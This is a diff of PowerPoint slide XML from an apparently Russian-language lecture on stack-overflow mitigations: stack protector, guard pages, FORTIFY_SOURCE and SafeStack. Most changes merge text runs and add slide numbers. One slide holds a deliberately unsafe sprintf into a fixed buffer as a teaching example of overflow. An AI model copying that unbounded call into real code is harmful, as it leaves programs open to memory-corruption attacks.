-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>, “Message from user: %s”, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>received_data</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>);</a:t>
+              <a:t>sprintf(buf, “Message from user: %s”, received_data);</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -5577,15 +6084,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Smashing, Return-to-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, Return-Oriented Programming</a:t>
+              <a:t>Stack Smashing, Return-to-libc, Return-Oriented Programming</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -5673,6 +6172,35 @@
               <a:t>https://www.rawpixel.com/image/5958324/free-public-domain-cc0-photo</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCAF2FB3-0ABE-4551-B64E-9996F34C73F0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>2</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6198,6 +6726,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Slide Number Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837665C3-96B2-456E-ABF8-F0D68E304AE0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>20</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -6469,6 +7026,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Slide Number Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9D7DF2-7182-4E99-9C45-F0F84CA36571}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>21</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -6684,6 +7270,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5692F676-EECA-41DF-A599-C5FB6F5F427A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>22</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -6867,17 +7482,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>BZ #1503589</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
+              <a:t>Firefox</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6891,26 +7496,41 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно включён не</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-strong </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>вариант (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>BUILD.gn</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
+              <a:t>включён слабый вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>23</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6998,6 +7618,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FDB8FB-EC86-43DD-81E2-8D3EDDB22543}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>24</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -7202,7 +7851,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>StackProtector по прежнему применяется для unsafe stack для обнаружения overflow</a:t>
+              <a:t>StackProtector по прежнему может применяться к unsafe stack для обнаружения overflow</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7281,6 +7930,35 @@
               <a:rPr lang="en-US" sz="1200" dirty="0"/>
               <a:t> </a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975D3649-1A78-45E0-83F0-2E1570B342E3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>25</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7513,6 +8191,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249366BE-B2D5-44AB-9B83-0E085D44D2E1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>26</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -7763,6 +8470,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>27</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -7846,6 +8582,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4008DB84-1716-48C3-B2ED-DAA41334F3CA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>28</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -7927,13 +8692,13 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Стек отделён от других сегментов незамаленой страницей </a:t>
+              <a:t>Стек отделён от других сегментов незамапленой страницей </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -7944,7 +8709,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Она служит для обнаружения исчерпания стека</a:t>
+              <a:t>Обнаруживает исчерпание стека</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7952,7 +8717,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Техника появилась в </a:t>
+              <a:t>Появилась в </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -8088,6 +8853,35 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D65D4D5-2F53-4D7F-A756-55E5B49D0F06}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>29</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8239,6 +9033,35 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6347226-6CF5-43E4-9854-7CE29CF68D36}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>3</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -8363,6 +9186,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A4AF19-423C-499A-8DA1-0C3269038E0D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>30</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -8673,6 +9525,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>31</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -8756,6 +9637,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C411EEFB-B011-401A-AE51-FD1830EFE51E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>32</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -9309,21 +10219,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -U_FORTIFY_SOURCE tmp5.c -O2 &amp;&amp; ./</a:t>
+              <a:t>$ gcc -U_FORTIFY_SOURCE tmp5.c -O2 &amp;&amp; ./</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -9536,21 +10432,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> tmp5.c -O2 &amp;&amp; ./</a:t>
+              <a:t>$ gcc tmp5.c -O2 &amp;&amp; ./</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -9592,6 +10474,35 @@
               </a:rPr>
               <a:t>Aborted (core dumped)</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3B263E-51BA-48BE-B2CD-3FE73B4D04E5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>33</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10164,6 +11075,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA20795-2D9E-47D0-B9F2-20E04C2DBE15}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>34</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -10310,15 +11250,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>strcpy</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
+              <a:t>, strcpy, </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -10459,6 +11391,35 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>компилятора (вычисление размера из контекста)</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4013101F-E777-4E2A-B122-E1E13BA60B11}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>35</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10630,8 +11591,16 @@
               <a:t>Конфликтует с </a:t>
             </a:r>
             <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Address- </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
